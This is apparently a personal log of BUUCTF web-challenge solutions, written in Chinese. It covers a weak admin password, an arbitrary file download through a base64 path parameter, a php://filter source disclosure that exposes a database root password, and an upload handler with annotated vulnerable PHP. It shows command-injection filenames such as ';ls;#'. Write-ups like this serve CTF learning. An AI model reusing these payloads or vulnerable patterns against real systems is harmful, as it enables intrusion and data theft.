buuctf刷题记录
- 游戏开发
- 2025-09-01 03:45:01

[watevrCTF-2019]Cookie Store
直接替换cookie
[GKCTF 2021]easycms：目录扫描得到后台地址 /admin.php，弱口令 admin/12345
漏洞利用：任意文件下载 ![[Pasted image 20250217183203.png]] 复制文件下载链接
admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=解码后面base64编码的字符串 ![[e619c089eeb34db9b392b2b4f8d6552a.png]] 发现可以下载文件 尝试替换为/flag ![[Pasted image 20250217183559.png]] ![[Pasted image 20250217183620.png]] 成功下载
[N1CTF 2018]eating_cms：扫描目录发现 register.php，注册并登录后发现文件包含漏洞
php://filter/convert.base64-encode/resource=register
register.php
<?php
// register.php (as reproduced in the writeup) — registration handler.
// Reads username/password from POST, creates the account via register()
// from function.php, and otherwise renders the registration template;
// a logged-in session is redirected to user.php.
require_once "function.php";
if($_POST['action'] === 'register'){
    if (isset($_POST['username']) and isset($_POST['password'])){
        // Raw POST values. register() (function.php) runs the username
        // through Filter() and stores md5($pass).
        $user = $_POST['username'];
        $pass = $_POST['password'];
        $res = register($user,$pass);
        if($res){
            // No exit() after the redirect header, so the rest of this
            // script (the template include below) still executes.
            Header("Location: index.php");
        }else{
            // Assigned but not read in this file — presumably consumed by
            // the template; cannot confirm from here.
            $errmsg = "Username has been registered!";
        }
    } else{
        Header("Location: error_parameter.php");
    }
}
// $_SESSION is available because function.php (required above) calls
// session_start().
if (!$_SESSION['login']) {
    include "templates/register.html";
} else {
    // "Location :" (space before the colon) is not a well-formed header
    // name, so clients may not follow this redirect.
    Header("Location : user.php?page=info");
}
?>function.php
<?php
// function.php — shared helpers for the eating_cms challenge: session setup,
// request-parameter filtering, and the string-built SQL used by login/register.
session_start();
require_once "config.php";

// Redirects to hacker.php and stops the script. PHP function names are
// case-insensitive, so the lowercase hacker() calls below resolve to this.
function Hacker() {
    Header("Location: hacker.php");
    die();
}

// Deny-list check on the query string of the current request: any key or
// value containing one of the keywords (case-insensitive, stristr) ends the
// request. A deny-list only sees what parse_url()/parse_str() manage to
// parse out of REQUEST_URI; an allow-list of permitted page names (cf.
// $OPERATE in config.php) is the robust way to restrict an include target.
function filter_directory() {
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
    // var_dump($query);
    // die();
    foreach($keywords as $token) {
        foreach($query as $k => $v) {
            if (stristr($k, $token)) hacker();
            if (stristr($v, $token)) hacker();
        }
    }
}

// Same check as filter_directory() with "info" added to the keyword list.
function filter_directory_guest() {
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
    // var_dump($query);
    // die();
    foreach($keywords as $token) {
        foreach($query as $k => $v) {
            if (stristr($k, $token)) hacker();
            if (stristr($v, $token)) hacker();
        }
    }
}

// Sanitiser for values that the callers below embed in SQL: a per-character
// allow-list, then a case-insensitive keyword deny-list (preg_match), then
// mysqli::real_escape_string(). The escaped value is still interpolated into
// query strings by login()/register(); prepared statements with bound
// parameters would remove that injection surface instead of filtering it.
function Filter($string) {
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

// Thin wrapper over mysqli::query() on the global connection from config.php.
function sql_query($sql_query) {
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

// Looks the user up by filtered username and md5(password) and populates the
// session on success. Defender notes: the SQL is echoed into the response
// (query/information leak — remove outside a CTF); unsalted md5 is not a
// password hash (password_hash()/password_verify()); the bare-word array keys
// (username_which_you_do_not_know, ...) are undefined constants, which older
// PHP treats as strings with a notice and PHP 8 rejects with an Error.
function login($user, $pass) {
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
    // var_dump($res);
    // die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return; // unreachable
}

// Sets the isadmin column for a username. Neither argument passes through
// Filter() here, so the caller must never hand it untrusted input (callers
// are not shown on this page). The SQL is echoed as in login(). The string
// literal below intentionally spans two lines (newline inside the query).
function updateadmin($level,$user) {
    $sql = "update `albert_users` 
set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
    // var_dump($res);
    // die();
    // die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return; // unreachable
}

// Inserts a new non-admin user (isadmin '0') with the filtered username and
// md5(password); returns mysqli::$insert_id (0 when nothing was inserted).
function register($user, $pass) {
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

// Destroys the session and redirects to index.php (again without exit()).
function logout() {
    session_destroy();
    Header("Location: index.php");
}
?>config.php
<?php
// config.php — runtime configuration and the shared mysqli connection.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
// Bare-word first argument to define(): an undefined constant (notice on
// older PHP, Error on PHP 8). The value "/var/ /html/" looks like an
// extraction artefact of the document-root path — TODO confirm against
// the original source.
define(BASEDIR, "/var/ /html/");
define(FLAG_SIG, 1);
// Presumably the permitted page names for normal and admin users; their
// use is not shown on this page.
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
// Database credentials (a root login) stored inside the web tree. Source
// files here can be read back through the php://filter include shown in
// this writeup, so anything in them is exposed. Keep secrets outside the
// document root (environment / secret store) and use a least-privilege
// database account.
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
// '@' suppresses the connection warning; the errno check below is the
// only error handling.
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
    echo "no sql connection".mysqli_connect_error();
    $mysqli=null;
    die();
}
?>blog.csdn.net/weixin_43536759/article/details/106785187 //user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php
// ffffllllaaaaggg — FLAG_SIG is defined in config.php, so this check only
// fails when the file runs without config.php having been loaded. A
// constant check guards execution, not disclosure: reading the file through
// php://filter (as this writeup does) returns the source without running it,
// so sensitive files belong outside the document root.
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>m4aaannngggeee.php
<?php
// m4aaannngggeee.php — same FLAG_SIG include-guard as above (config.php
// defines FLAG_SIG as 1), then renders the upload form template. The guard
// does not prevent the source from being read via php://filter.
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";
?>访问templates/upload.html ![[3065660-20241014144510436-64347080.png]] upllloadddd.php
<?php
// upllloadddd.php — upload handler. The client-supplied file name is trusted
// throughout, which is the root cause of every issue noted below.
$allowtype = array("gif","png","jpg");
$size = 10000000; // assigned but never checked: no size limit is enforced
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
// Raw name from the request: no basename(), no character or extension check
// before it is used as a path component and, further down, inside a shell
// command. A server-generated name (and validation before the move) fixes both.
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    // The file is written to disk before the extension is validated.
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename; // reflected unescaped; htmlspecialchars() for HTML output
// Command injection: $filename is concatenated into a shell command line with
// no escaping (the writeup demonstrates this). Mitigation: do not shell out at
// all — base64_encode(file_get_contents($newfile)) — or at minimum
// escapeshellarg(). Note also that system() echoes the command's output into
// the response and returns only its last line.
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
// The extension check runs last — after the move and after the shell
// command — so it cannot prevent either; in_array() is non-strict here.
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>![[3065660-20241014144514660-375299453.png]]
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");;ls;# ![[Pasted image 20250217203043.png]]
;cd …;ls;# ![[3065660-20241014144518805-1607377507.png]]